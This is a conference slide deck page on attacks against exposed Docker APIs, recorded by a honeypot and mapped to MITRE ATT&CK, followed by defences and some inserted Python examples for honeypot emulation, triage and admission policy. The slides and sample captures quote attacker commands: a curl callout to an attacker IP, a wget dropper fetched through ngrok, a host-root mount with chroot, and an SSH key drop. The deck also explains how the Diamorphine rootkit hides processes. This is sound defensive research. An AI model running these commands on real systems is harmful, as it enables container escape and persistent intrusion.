ATT&CKing Containers in The Cloud
Jared Stroud (@DLL_Cool_J)
© 2022, Lacework Inc. All Rights Reserved.
$> whoami
● Jared Stroud
● Currently: Cloud Security Researcher @ Lacework
● Former: MITRE Security Engineer
○ ATT&CK EVALS Carbanak/Fin7
○ CALDERA
● Presented at:
○ SANS Blue Team Summit - Lightning Talk
○ DEFCON - Packet Hacking Village
○ Interpol DFEG
○ Shmoocon - Fire Talk
○ DFRWS - EU
○ BSides Roc
Lacework Labs is the dedicated research team at Lacework. We decided to focus on areas that we believe are not getting enough attention in the research community, specifically new threats and attack-surface risks within the public cloud. Like any good research team, we use a combination of data-driven intelligence creation and our own expertise in the key areas we focus on.
Agenda
● The Shift to Container Workloads
● Honeypots
● Analyze The Data
● Container Focused Defenses
Shifting to Container Workloads
● Enterprise continues to adopt container workloads.
○ This “shift left” mentality provides business advantages to get products to end-users faster.
● Adversaries have noticed, and have targeted misconfigurations around the container ecosystem, including:
○ T1190 - Code repositories CI/CD pipelines
■ Ex: Gitlab
○ T1538 - Cloud Service Dashboards
○ T1552.007 - Exposed APIs for Containers.
● Lacework Labs has observed the introduction of “rogue images” into environments via:
○ T1610 - Deploying a container.
○ T1608 - Stage malicious container on Docker Hub.
Collecting Cloud Attack Data - Honeypots
● Honeypots
○ Emulate a service to a specific level of fidelity so an attacker throws an exploit/payload for collection.
● Consider the level of emulation fidelity you need.
○ Anecdotal example: having a simple netcat listener on port 9200 for Elasticsearch has caught the same payloads as Elasticsearch honeypots that actually do a level of service emulation.
○ Consider the adversary you’re looking to catch data from
■ Opportunistic vs Targeted
Building Whalehoney - A Docker Honeypot
● At the time of architecting our honeypot infrastructure, not many solutions existed for Docker that weren’t heavily tied to a particular database.
● Engineers at Lacework Labs developed a simple Python Flask based application to emulate the Docker API based on the available documentation on the Docker engine.
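A minimal emulator in the spirit of the honeypot described above, added here as an example and not Lacework's Whalehoney code: it answers the handful of Docker Engine API endpoints a scripted client expects (ping, version, image pull, container create/start) and records every request in a capture log, using only the Python standard library instead of Flask. The endpoint labels (such as `api_container_create`), the fake version values and the in-memory log are assumptions for this illustration.

```python
"""Low-fidelity Docker Engine API emulation for capturing attacker requests.

Added example, not Whalehoney's code. Endpoint labels, fake version data and the
in-memory CAPTURES list are constructed for this illustration.
"""
import json
import re
import secrets
import time
from http.server import BaseHTTPRequestHandler, HTTPServer

# Docker clients prefix paths with an API version, e.g. /v1.41/containers/create.
VERSION_PREFIX = re.compile(r"^/v\d+\.\d+")

# Just enough of a /version answer to keep a scripted client talking to us.
FAKE_VERSION = {"Version": "20.10.17", "ApiVersion": "1.41", "MinAPIVersion": "1.12",
                "Os": "linux", "Arch": "amd64", "KernelVersion": "5.15.0-fake"}

CAPTURES = []  # in-memory capture log; a deployment would append JSON lines to disk


def classify(method, path):
    """Name the emulated endpoint for a request, or None if we do not emulate it."""
    bare = VERSION_PREFIX.sub("", path).split("?", 1)[0]
    if method == "GET" and bare == "/_ping":
        return "api_ping"
    if method == "GET" and bare == "/version":
        return "api_version"
    if method == "GET" and bare == "/info":
        return "api_info"
    if method == "POST" and bare == "/images/create":
        return "api_image_pull"
    if method == "POST" and bare == "/containers/create":
        return "api_container_create"
    if method == "POST" and re.fullmatch(r"/containers/[^/]+/start", bare):
        return "api_container_start"
    return None


def handle(method, path, body, peer="0.0.0.0"):
    """Record the request and return (status, payload). Pure function, easy to test."""
    endpoint = classify(method, path)
    record = {"ts": time.time(), "peer": peer, "method": method, "path": path,
              "endpoint": endpoint, "body": body.decode("utf-8", "replace")}
    try:
        record["json"] = json.loads(body) if body else None
    except ValueError:
        record["json"] = None
    CAPTURES.append(record)

    if endpoint == "api_ping":
        return 200, "OK"
    if endpoint == "api_version":
        return 200, FAKE_VERSION
    if endpoint == "api_info":
        return 200, {"ServerVersion": FAKE_VERSION["Version"], "Containers": 0, "Images": 0}
    if endpoint == "api_image_pull":
        return 200, {"status": "Pulling from library/alpine", "id": "latest"}
    if endpoint == "api_container_create":
        # A real daemon answers 201 with the new container ID; the HostConfig and
        # Cmd in the request body are what the honeypot actually wants to keep.
        return 201, {"Id": secrets.token_hex(32), "Warnings": []}
    if endpoint == "api_container_start":
        return 204, None
    return 404, {"message": "page not found"}


class Handler(BaseHTTPRequestHandler):
    def _serve(self):
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length) if length else b""
        status, payload = handle(self.command, self.path, body, self.client_address[0])
        self.send_response(status)
        if payload is None:
            self.end_headers()
            return
        is_text = isinstance(payload, str)
        data = payload.encode() if is_text else json.dumps(payload).encode()
        self.send_header("Content-Type", "text/plain" if is_text else "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    do_GET = do_POST = do_PUT = do_DELETE = _serve

    def log_message(self, *args):  # requests are kept in CAPTURES, not printed
        pass


if __name__ == "__main__":
    # 2375 is the unauthenticated Docker TCP port the attacks in this talk hit.
    HTTPServer(("0.0.0.0", 2375), Handler).serve_forever()
```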
Quick Whalehoney Stats
● 244 unique payloads targeting the “api_container_create” endpoint
○ 24 payloads setting “privileged:true”
● 3 external SAAS services observed being used in attacks: Docker Hub, Ngrok, Weaveworks’ Scope
○ Ngrok being leveraged in 146 payloads.
Typical Observed Execution Killchain
Deploy Container (T1610) & Escape to Host (T1611)
● Deploy container: achieved via exposed API
● Escape to Host: achieved via mounting host’s “/” to container’s “/mnt” and chrooting
T1611 - From Container → Host Pivot
[Diagram: attacker’s payload sent to the exposed API port (2375); mount /:/mnt && chroot /mnt]
T1059.004 - Post-compromise Payloads - Shell Script Dropper
[Diagram: same flow as above, attacker’s payload via the exposed API port (2375)]
Post-compromise Payloads - Rootkits, Cryptominers, and ssh keys
[Diagram: same flow as above, attacker’s payload via the exposed API port (2375)]
Notable Execution of Initial Payload (cronb.sh)
● ~1500 line bash script (T1059.004) to deploy additional utilities including:
○ Kill potential cryptocurrency miners on host.
○ Deploys their own XMRig Cryptocurrency miner
● Observed TTPs:
○ Kills Alibaba (CloudMonitor/Aliyun) cloud monitoring agent (T1562.001)
○ Deploys SSH key for continued access (T1098.004)
○ Deploys .so’s for LD_PRELOAD attacks (T1574.006)
○ Deploys Diamorphine Rootkit for hiding access (T1014)
○ Naming ELF payloads to <file_name>.jpg when downloading (T1036)
○ Deploying C2 Agent (ZiggyStartgux/Katien/Tsunami - IRC Bot)
○ curl <attacker_controlled_ip>/idcheck/$(id) (obtain user id)
Notable Execution of Initial Payload (cronb.sh)
● T1574.006 - Hijack Execution Flow: Dynamic Linker Hijacking
○ Used for persistence/defense evasion
● Attack script wgets tar file of shared objects to be placed in /usr/local/lib and put in ld.so.preload.
[Figure: Ghidra pseudo C of the shared objects grabbed by the Docker bash script]
Reference: https://github.com/gianlucaborello/libprocesshider/blob/master/processhider.c
Defense Evasion/Persistence - Diamorphine Rootkit
● Rootkit (T1014) features include:
○ When loaded, the module starts invisible.
○ Hide/unhide any process by sending a signal 31.
○ Sending a signal 63 (to any pid) makes the module become (in)visible.
○ Sending a signal 64 (to any pid) makes the given user become root.
○ Files or directories starting with the MAGIC_PREFIX become invisible.
● Diamorphine is built on the victim machine, and has the MAGIC_PREFIX unchanged.
[Figure: diamorphine.h from attacker’s payload]
Reference: https://github.com/m0nad/Diamorphine/blob/master/diamorphine.h
T1189 - Drive by Compromise (SSH Key Dropping)
[Diagram: attacker’s payload via the exposed API port (2375); echo ssh key to /root/.ssh/authorized_keys]
● "cmd": ["sh", "-c", "echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIdl8SFK8a6VAjM6i8AAUtpl15<snippet>' >> /opt/root/.ssh/authorized_keys"]
T1133 - External Remote Services (Weaveworks Scope)
…
"cmd":["--probe.docker=true","--service-token=<REDACTED>"],
"Image":"weaveworks/scope:1.13.2"
…
T1608 - Staging Capabilities (Docker Hub)
● Lacework Labs has observed multiple adversaries leveraging Docker Hub as a staging ground.
T1608 - Staging Capabilities (Ngrok)
● Ngrok - legitimate utility for proxying local connections to public facing services (T1090).
○ Target users are developers that want to expose something running locally on the internet.
○ Think of it as reverse ssh tunnels-as-a-service
● How adversaries abuse it:
○ Hosting payloads behind ngrok.
■ Free tier/paid tiers exist.
○ Avoids having to set up infrastructure beyond a VM.
Stopping The Compromise! Don’t expose the Docker Socket!
[Diagram: the same attacker’s payload / exposed API port (2375) / mount /:/mnt && chroot /mnt flow as above]
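To show what triage of honeypot captures looks like across the payload shapes on the slides above (the host-root bind mount and chroot, the authorized_keys drop, the Weaveworks Scope image and the ngrok-staged dropper), here is an added example that is not Whalehoney's or Lacework's code. The request bodies are constructed to resemble those payloads, the placeholder hosts are not real infrastructure, and the technique mapping follows the slides.

```python
"""Triage of captured Docker API container-create bodies against observed techniques.

Added example, not Whalehoney code. SAMPLE_CAPTURES are constructed bodies for
POST /containers/create modelled on the slides; placeholders in <> are not real.
"""
import json

SAMPLE_CAPTURES = [
    # Host "/" bind-mounted at /mnt, then chroot: the container -> host pivot.
    {"Image": "alpine:latest",
     "Cmd": ["sh", "-c", "chroot /mnt sh -c 'curl http://<attacker_controlled_ip>/idcheck/$(id)'"],
     "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False}},
    # Privileged container writing an SSH key into the host's root account.
    {"Image": "alpine:latest",
     "Cmd": ["sh", "-c", "echo 'ssh-rsa AAAA<snippet>' >> /opt/root/.ssh/authorized_keys"],
     "HostConfig": {"Binds": ["/:/opt"], "Privileged": True}},
    # Third-party agent (Weaveworks Scope) pointed at the attacker's service token.
    {"Image": "weaveworks/scope:1.13.2",
     "Cmd": ["--probe.docker=true", "--service-token=<REDACTED>"],
     "HostConfig": {"Binds": [], "Privileged": False}},
    # Dropper staged behind an ngrok tunnel instead of attacker-owned infrastructure.
    {"Image": "alpine:latest",
     "Cmd": ["sh", "-c", "wget http://<tunnel>.ngrok.io/cronb.sh"],
     "HostConfig": {"Binds": [], "Privileged": False}},
    # Benign-looking request: named volume, no host paths, not privileged.
    {"Image": "nginx:1.21",
     "Cmd": None,
     "HostConfig": {"Binds": ["webdata:/usr/share/nginx/html"], "Privileged": False}},
]


def host_root_binds(body):
    """Bind mounts whose host side is '/', i.e. the whole host filesystem."""
    binds = (body.get("HostConfig") or {}).get("Binds") or []
    return [b for b in binds if b.split(":", 1)[0] == "/"]


def cmd_text(body):
    """Flatten Entrypoint/Cmd (list or string) into one searchable string."""
    parts = []
    for key in ("Entrypoint", "Cmd"):
        val = body.get(key)
        if isinstance(val, str):
            parts.append(val)
        elif val:
            parts.extend(str(v) for v in val)
    return " ".join(parts)


def triage(body):
    """Return (technique_id, reason) pairs for one container-create request."""
    hc = body.get("HostConfig") or {}
    image = body.get("Image") or ""
    cmd = cmd_text(body)
    findings = []
    if hc.get("Privileged") is True:
        findings.append(("T1610", "container created with Privileged=true"))
    for bind in host_root_binds(body):
        findings.append(("T1611", f"host root bind-mounted into container ({bind})"))
    if "chroot" in cmd:
        findings.append(("T1611", "chroot into a mounted host filesystem"))
    if "authorized_keys" in cmd:
        findings.append(("T1098.004", "SSH authorized_keys written from container"))
    if image.split(":")[0] == "weaveworks/scope":
        findings.append(("T1133", "Weaveworks Scope probe deployed through the API"))
    if "ngrok" in cmd:
        findings.append(("T1608", "payload staged behind an ngrok tunnel (T1090 proxy)"))
    return findings


def technique_ids(body):
    """Sorted, de-duplicated technique IDs for one request."""
    return sorted({tid for tid, _ in triage(body)})


def summarize(captures):
    """Counts in the style of the 'Quick Whalehoney Stats' slide."""
    unique = {json.dumps(c, sort_keys=True) for c in captures}
    stats = {"unique_payloads": len(unique), "privileged": 0, "ngrok": 0, "by_technique": {}}
    for body in captures:
        hc = body.get("HostConfig") or {}
        stats["privileged"] += int(hc.get("Privileged") is True)
        stats["ngrok"] += int("ngrok" in cmd_text(body))
        for tid in technique_ids(body):
            stats["by_technique"][tid] = stats["by_technique"].get(tid, 0) + 1
    return stats
```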
Beyond ACLs & Limiting exposed container APIs
Docker Content Trust (DCT)
● Leverage Docker Content Trust (DCT) to enforce digital signatures for runtime verification of images in your environment.
○ Prevent non-signed images from running.
○ Caveat, DCT is enabled/disabled via an environment variable.
● Docker Notary
○ Built around The Update Framework
● Does introduce additional management overhead of handling signing keys/revocations/etc…
Reference: https://docs.docker.com/engine/security/trust/
Beyond ACLs & Limiting exposed container APIs
Securing Kubernetes Deployments
● Prevent accidental exposure of management dashboards!
○ Including 3rd party integrations (Argo/Gitlab/etc…)
● Open Policy Agent (OPA) Enforcement!
○ Admission controller to prevent privileged pods or unnecessary capabilities being paired with deployments in given namespaces.
○ Ex: prevent CAP_SYS_ADMIN from being set on a deployment.
● Deploy Signed Containers
○ GCP’s GKE - Binary Authorization
■ Ensure deployed workloads have been signed.
○ AWS EKS Image signing is on their road map according to documentation
■ https://aws.github.io/aws-eks-best-practices/security/docs/image/
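The admission-controller idea above, written out as an added example in Python (mirroring the checks an OPA/Gatekeeper policy would express in Rego; this is neither OPA's nor Lacework's code): it denies privileged containers and CAP_SYS_ADMIN in a set of guarded namespaces, looks through a Deployment's pod template as well as bare Pods, and covers init and ephemeral containers, which naive policies often miss. The namespace list and the manifests are constructed for the illustration.

```python
"""Admission-style guard rails: no privileged containers, no CAP_SYS_ADMIN.

Added example showing the logic an OPA/Gatekeeper admission policy enforces; it is
not Rego and not OPA's or Lacework's code. GUARDED_NAMESPACES and the sample
manifests are constructed for this illustration.
"""

GUARDED_NAMESPACES = {"prod", "payments"}  # constructed scope for the policy
# Kubernetes names capabilities without the CAP_ prefix; accept both spellings.
BLOCKED_CAPABILITIES = {"SYS_ADMIN"}


def normalize_cap(cap):
    cap = str(cap).upper()
    return cap[4:] if cap.startswith("CAP_") else cap


def pod_template(obj):
    """Return the pod spec for a Pod or for a workload that wraps a pod template."""
    spec = obj.get("spec") or {}
    if "template" in spec:  # Deployment/DaemonSet/StatefulSet/Job
        return (spec["template"].get("spec") or {})
    return spec


def containers_of(pod_spec):
    # initContainers and ephemeralContainers run with the same privileges and are
    # a classic gap when a policy only inspects spec.containers.
    for field in ("initContainers", "containers", "ephemeralContainers"):
        for c in pod_spec.get(field) or []:
            yield field, c


def violations(obj, guarded=GUARDED_NAMESPACES, blocked=BLOCKED_CAPABILITIES):
    """List policy violations for a Pod or workload object; empty list means allowed."""
    ns = (obj.get("metadata") or {}).get("namespace", "default")
    if ns not in guarded:
        return []
    problems = []
    for field, c in containers_of(pod_template(obj)):
        name = c.get("name", "<unnamed>")
        sc = c.get("securityContext") or {}
        if sc.get("privileged") is True:
            problems.append(f"{field}/{name}: privileged containers are not allowed in {ns}")
        added = {normalize_cap(x) for x in (sc.get("capabilities") or {}).get("add") or []}
        for cap in sorted(added & set(blocked)):
            problems.append(f"{field}/{name}: capability {cap} is not allowed in {ns}")
    return problems


def admission_response(review):
    """Build the AdmissionReview v1 response a validating webhook would return."""
    req = review["request"]
    problems = violations(req["object"])
    response = {"uid": req["uid"], "allowed": not problems}
    if problems:
        response["status"] = {"code": 403, "message": "; ".join(problems)}
    return {"apiVersion": "admission.k8s.io/v1", "kind": "AdmissionReview",
            "response": response}


# Constructed manifests: one that should be denied and one that should pass.
DENIED_DEPLOYMENT = {
    "kind": "Deployment",
    "metadata": {"name": "sample-workload", "namespace": "prod"},
    "spec": {"template": {"spec": {
        "initContainers": [{"name": "setup", "securityContext": {"privileged": True}}],
        "containers": [{"name": "app", "securityContext": {
            "capabilities": {"add": ["CAP_SYS_ADMIN", "NET_BIND_SERVICE"]}}}],
    }}},
}
ALLOWED_POD = {
    "kind": "Pod",
    "metadata": {"name": "web", "namespace": "prod"},
    "spec": {"containers": [{"name": "web", "securityContext": {
        "capabilities": {"add": ["NET_BIND_SERVICE"]}}}]},
}
```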
Beyond ACLs & Limiting exposed container APIs
Exploring Runtime Protection Options
● Profile and limit the syscalls your application makes!
○ Runtime syscall allow-listing via seccomp
● Can be tricky to tune, but greatly reduces surface in the event of an application compromise.
Reference: https://www.lacework.com/blog/sand-honey-building-honeypots/
Beyond ACLs & Limiting exposed container APIs
Honey Tokens in Cloud Native Environments
● What about non-opportunistic attackers?
○ Targeting resource specific services
○ Ex: Managed DBs, Container Registries, etc…
● Proactive Defenses via “honey tokens” around specific cloud native resources
○ Ex: Container Registry with beta-database-secrets-test
Reference: https://www.lacework.com/blog/diy-canary-tokens-in-aws
Tool Release! Docker Honeypot - Whalehoney
Whalehoney, simple API emulation
https://www.github.com/lacework-dev/whalehoney-PUBLIC
Recap
Observed ATT&CKs
● T1610/T1611 - Deploy containers and escape to host.
● T1059.004 - Post-compromise payloads (Shell Script)
● T1562.001 - Impairing Defenses
● T1098.004 - Deploying ssh keys for persistence
● T1574.006/T1014 - LD_PRELOAD/KOs for hijacking execution flow
Defending In the Cloud
● Limit attack surface exposure (ingress/egress ACLs)
● Enforce signed container image deployments
● Implement security policies around the API calls that are possible
● OPA for security policy enforcement of Kubernetes
● Proactive Defense via Honey Tokens
Thank you.
IF YOU HAVE QUESTIONS, PLEASE GET IN TOUCH WITH
laceworklabs@lacework.com
Civil Society, Pegasus, and Predator: What Sophisticated Spyware Means For Us...
 
Evaluating and Enhancing Security Maturity through MITRE ATT&CK Mapping
Evaluating and Enhancing Security Maturity through MITRE ATT&CK MappingEvaluating and Enhancing Security Maturity through MITRE ATT&CK Mapping
Evaluating and Enhancing Security Maturity through MITRE ATT&CK Mapping
 
MITRE ATT&CK Updates: State of the ATT&CK (ATT&CKcon 4.0 Edition)
MITRE ATT&CK Updates: State of the ATT&CK (ATT&CKcon 4.0 Edition)MITRE ATT&CK Updates: State of the ATT&CK (ATT&CKcon 4.0 Edition)
MITRE ATT&CK Updates: State of the ATT&CK (ATT&CKcon 4.0 Edition)
 
MITRE ATT&CK based Threat Analysis for Electronic Flight Bag
MITRE ATT&CK based Threat Analysis for Electronic Flight BagMITRE ATT&CK based Threat Analysis for Electronic Flight Bag
MITRE ATT&CK based Threat Analysis for Electronic Flight Bag
 
Tidying up your Nest: Validating ATT&CK Technique Coverage using EDR Telemetry
Tidying up your Nest: Validating ATT&CK Technique Coverage using EDR TelemetryTidying up your Nest: Validating ATT&CK Technique Coverage using EDR Telemetry
Tidying up your Nest: Validating ATT&CK Technique Coverage using EDR Telemetry
 
Exploring the Labyrinth: Deep dive into the Lazarus Group's foray into macOS
Exploring the Labyrinth: Deep dive into the Lazarus Group's foray into macOSExploring the Labyrinth: Deep dive into the Lazarus Group's foray into macOS
Exploring the Labyrinth: Deep dive into the Lazarus Group's foray into macOS
 
MITRE ATT&CK Updates: State of the Cloud
MITRE ATT&CK Updates: State of the CloudMITRE ATT&CK Updates: State of the Cloud
MITRE ATT&CK Updates: State of the Cloud
 
Using ATT&CK to created wicked actors in real data
Using ATT&CK to created wicked actors in real dataUsing ATT&CK to created wicked actors in real data
Using ATT&CK to created wicked actors in real data
 
MITRE ATT&CK Updates: New Ideas in Enterprise - Pushing the boundaries of ATT...
MITRE ATT&CK Updates: New Ideas in Enterprise - Pushing the boundaries of ATT...MITRE ATT&CK Updates: New Ideas in Enterprise - Pushing the boundaries of ATT...
MITRE ATT&CK Updates: New Ideas in Enterprise - Pushing the boundaries of ATT...
 
Detection as Code, Automation, and Testing: The Key to Unlocking the Power of...
Detection as Code, Automation, and Testing: The Key to Unlocking the Power of...Detection as Code, Automation, and Testing: The Key to Unlocking the Power of...
Detection as Code, Automation, and Testing: The Key to Unlocking the Power of...
 
Navigating the Attention Economy – Using MITRE ATT&CK to Communicate to Stake...
Navigating the Attention Economy – Using MITRE ATT&CK to Communicate to Stake...Navigating the Attention Economy – Using MITRE ATT&CK to Communicate to Stake...
Navigating the Attention Economy – Using MITRE ATT&CK to Communicate to Stake...
 
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...
 
Driving Intelligence with MITRE ATT&CK: Leveraging Limited Resources to Build...
Driving Intelligence with MITRE ATT&CK: Leveraging Limited Resources to Build...Driving Intelligence with MITRE ATT&CK: Leveraging Limited Resources to Build...
Driving Intelligence with MITRE ATT&CK: Leveraging Limited Resources to Build...
 
MITRE ATT&CK Updates: ICS
MITRE ATT&CK Updates: ICSMITRE ATT&CK Updates: ICS
MITRE ATT&CK Updates: ICS
 
The case for quishing
The case for quishingThe case for quishing
The case for quishing
 

Kürzlich hochgeladen

SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 

Kürzlich hochgeladen (20)

SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 

ATT&CKING Containers in The Cloud

  • 1. ATT&CKing Containers in The Cloud
  Jared Stroud (@DLL_Cool_J)
  © 2022, Lacework Inc. All Rights Reserved.

  • 2. $> whoami
  ● Jared Stroud
  ● Currently: Cloud Security Researcher @ Lacework
  ● Former: MITRE Security Engineer
    ○ ATT&CK EVALS Carbanak/Fin7
    ○ CALDERA
  ● Presented at:
    ○ SANS Blue Team Summit - Lightning Talk
    ○ DEFCON - Packet Hacking Village
    ○ Interpol DFEG
    ○ Shmoocon - Fire Talk
    ○ DFRWS - EU
    ○ BSides Roc
